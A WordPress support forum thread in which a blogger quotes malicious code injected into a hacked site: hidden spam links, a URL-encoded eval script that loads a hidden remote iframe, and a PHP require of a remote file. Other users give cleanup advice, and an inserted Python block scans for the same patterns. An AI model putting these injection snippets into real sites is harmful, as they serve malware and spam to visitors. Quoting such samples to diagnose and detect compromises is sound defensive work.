Title: WordPress Exploit: script inserted into code
Last modified: August 19, 2016

---

# WordPress Exploit: script inserted into code

 *  [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/)
 * Lately some of my WordPress blogs have been targeted by some hacker. Every time
   I check out the source of my blogs I see these kinds of links:
 *     ```
       </body></html><font style='position: absolute;overflow: hidden;height: 0;width: 0'>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra.htm"; title="buy viagra">buy viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online.htm"; title="buy viagra online">buy viagra online</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online-viagra.htm"; title="buy viagra online viagra">buy viagra online viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=viagra-buy.htm"; title="viagra buy">viagra buy</a>
       ```
   
 * It has nothing to do with my theme, I’m using my own theme and I am 100% sure
   that the theme is not the source of the problem.
 * I have been monitoring my weblogs to see what the cause of the problem is. Here
   is a list of what I tried to stop it:
 * – Upgrade to the latest WP (Yet it kept coming back)
 * – Secure WP admin with htaccess (No effect)
 * – Change FTP password
 * – Check permissions of files and folders
 * – Check plugins
 * Another thing that I noticed is the following. Almost all of my themes also had
   the following code inserted at the end of the source code:
 *     ```
       <Script>
       <!--
       var d=document;
       eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%28%65%6c%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%29%2e%6c%65%6e%67%74%68%29%7b%69%66%28%20%28%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%5b%69%5d%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%5b%69%5d%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%5b%69%5d%2e%6e%61%6d%65%21%3d%63%31%20%29%20%7b%65%6c%5b%69%5d%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%5b%69%5d%29%3b%7d%69%20%2b%2b%3b%7d%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%35%37%30%29%2b%27%33%66%61%66%61%30%30%64%36%62%5c%27%20%77%69%64%74%68%3d%31%30%37%20%68%65%69%67%68%74%3d%35%31%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
       //-->
       </Script>
       ```
   
 * What I noticed is that the only solution was to rewrite the old WordPress files
   with the ones that I downloaded. I finally found where the code was being inserted:
   index.php in the root folder of the weblog.
 * I would like to know the following things:
 * – Is this because of my setup or is this some new WP exploit?
 * – What can I do to stop these kind of exploits in the future?
 * Thanks!

Viewing 15 replies - 1 through 15 (of 21 total)


 *  [Jeremy Clark](https://wordpress.org/support/users/jeremyclark13/)
 * (@jeremyclark13)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718111)
 * [Post released from Akismet queue]
 *  [sensifreak](https://wordpress.org/support/users/sensifreak/)
 * (@sensifreak)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718113)
 * It's an XSS, I think. Have you got a link to your site?
 *  [sensifreak](https://wordpress.org/support/users/sensifreak/)
 * (@sensifreak)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718115)
 * If it's the amsterdam, delete the comments I made; they are secure.
 *  Thread Starter [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718151)
 * I found a temporary fix for the problem:
   I chmodded index.php to 444. That seems to stop the problem at this moment.
 * Is there anything else I can do?
 *  Thread Starter [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718225)
 * The problem is back again.
 * Now they attacked the wp-content index.php file.
   This is what I found:
 *     ```
       <?php
       // Silence is golden.
   
       require('http://lovetabs.rxfeel.com/files/temp.php');
   
       ?>
       ```
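
Added example, not part of the thread and not code from any poster: a static scanner for the three injection patterns quoted above (hidden links after `</html>`, the `eval(unescape("…"))` script, and the remote `require`). It decodes the escaped string as text without executing it; `scan` is a hypothetical helper name, and the sample inputs and `example.invalid` hosts are constructed.

```python
import re
from urllib.parse import unquote

# Patterns modelled on the three injected snippets quoted in this thread.
EVAL_UNESCAPE = re.compile(r'eval\s*\(\s*unescape\s*\(\s*"([^"]*)"', re.I)
REMOTE_INCLUDE = re.compile(
    r'\b(?:require|include)(?:_once)?\s*\(?\s*[\'"](https?://[^\'"]+)', re.I)
AFTER_HTML_END = re.compile(r'</html\s*>(.*)', re.I | re.S)
HIDDEN_STYLE = re.compile(r'(?:height|width)\s*:\s*0(?![\d.])|display\s*:\s*none', re.I)
URL = re.compile(r'https?://[^\s\'"\\<>]+', re.I)

def scan(text):
    """Return (finding, detail) tuples for one file's contents."""
    findings = []
    for m in EVAL_UNESCAPE.finditer(text):
        decoded = unquote(m.group(1))  # decoded as text only, never executed
        if re.search(r'<iframe', decoded, re.I):
            findings.append(("obfuscated-iframe", URL.findall(decoded)))
        else:
            findings.append(("eval-unescape", decoded[:60]))
    for m in REMOTE_INCLUDE.finditer(text):
        findings.append(("remote-include", m.group(1)))
    tail = AFTER_HTML_END.search(text)
    if tail and HIDDEN_STYLE.search(tail.group(1)):
        links = re.findall(r'<a\s', tail.group(1), re.I)
        if links:  # markup after the closing tag that hides anchors
            findings.append(("hidden-links-after-html", len(links)))
    return findings

# Constructed samples (hosts under example.invalid are placeholders).
_JS = ("d.write('<IFRAME src=\\'http://frame.example.invalid/in.cgi\\' "
       "style=\\'display: none\\'></IFRAME>');")
SAMPLE_THEME = ('<Script>\nvar d=document;\neval( unescape( "'
                + "".join("%%%02x" % b for b in _JS.encode()) + '" ));\n</Script>')
SAMPLE_INDEX = ("<?php\n// Silence is golden.\n"
                "require('http://files.example.invalid/temp.php');\n?>")
SAMPLE_PAGE = ("<html><body>post</body></html>"
               "<font style='position: absolute;overflow: hidden;height: 0;width: 0'>\n"
               '<a href="http://spam.example.invalid/page.php?q=a.htm">a</a>\n'
               '<a href="http://spam.example.invalid/page.php?q=b.htm">b</a>')
CLEAN_INDEX = "<?php\n// Silence is golden.\n?>"

if __name__ == "__main__":
    for name in ("SAMPLE_THEME", "SAMPLE_INDEX", "SAMPLE_PAGE", "CLEAN_INDEX"):
        print(name, scan(globals()[name]))
```

Run `scan` over the contents of every `index.php`, theme file and static page in the account; any finding means the file should be replaced from a known-clean copy rather than edited by hand.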
   
 *  [viper007bond](https://wordpress.org/support/users/viper007bond/)
 * (@viper007bond)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718229)
 * I’d talk to your host.
 *  Thread Starter [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718232)
 * Apparently I am not the only one:
 * [http://support.technorati.com/discussions/topic/3295](http://support.technorati.com/discussions/topic/3295)
 * Technorati noticed the issue also and mailed every single member that uses WordPress.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718233)
 * _Technorati noticed the issue also and mailed every single member that uses WordPress._
 * That's simply not true, since I didn't get an e-mail. In fact, they have no way
   of doing such a thing.
 *  [mvandemar](https://wordpress.org/support/users/mvandemar/)
 * (@mvandemar)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718236)
 * Yeah, I didn’t get an email either. They must not love you and me whoo. 😛
 * Ian did post about it on the Technorati blog though. Any ideas what might be 
   going on?
 *  [Michael Torbert](https://wordpress.org/support/users/hallsofmontezuma/)
 * (@hallsofmontezuma)
 * WordPress Virtuoso
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718238)
 * I wouldn’t be too worried. It could be something, but a lot of people have crappy/insecure
   servers and then blame WordPress when they’re compromised.
   I have many many WordPress installations on a variety of different servers, and
   have never had one hacked.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718247)
 * I’m running WordPress 2.5.1 and today got the same problem. Does anyone know
   how I can prevent it?
 * Site is [http://dvicr.com](http://dvicr.com). Code inserted on every index.php
   and every htm page on all my sites (my sites share same space on godaddy).
 *  [obscure](https://wordpress.org/support/users/obscure/)
 * (@obscure)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718250)
 * > Here is a list of what I tried to stop it:
   > – Upgrade to the latest WP (Yet it kept coming back)
   > – Secure WP admin with htaccess (No effect)
   > – Change FTP password
   > – Check permissions of files and folders
   > – Check plugins
 * Did you change your admin password?
   Did you delete all the compromised files and posts?
 *  [Marcel Brinkkemper](https://wordpress.org/support/users/macbrink/)
 * (@macbrink)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718251)
 * Are you on a shared host?
   Some user on the same host could use scripts to insert the code on your site.
   I’d talk to your host about this soon.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718252)
 * > Are you on a shared host?
   > Some user on the same host could use scripts to insert the code on your site.
   > I’d talk to your host about this soon.
 * Yes, I’m on shared host, but it’s pretty secure (godaddy.com), so I don’t think
   anyone can break into other users area.
 * > Did you change your admin password?
   > Did you delete all the compromised files and posts?
 * Sure, and I also secured blog with all the knowledge I have. No evil scripts
   so far. I still wonder how it got there in the first place.
 *  [Michael Torbert](https://wordpress.org/support/users/hallsofmontezuma/)
 * (@hallsofmontezuma)
 * WordPress Virtuoso
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/#post-718255)
 * On all your sites? Doesn’t sound like a WordPress issue to me. Odds are, your
   server account or server itself has been compromised.
   Change _all_ your server passwords (including mysql).


The topic ‘WordPress Exploit: script inserted into code’ is closed to new replies.

 * In: [Developing with WordPress](https://wordpress.org/support/forum/wp-advanced/)
 * 21 replies
 * 12 participants
 * Last reply from: [segal](https://wordpress.org/support/users/segal/)
 * Last activity: [18 years ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718270)
 * Status: not resolved

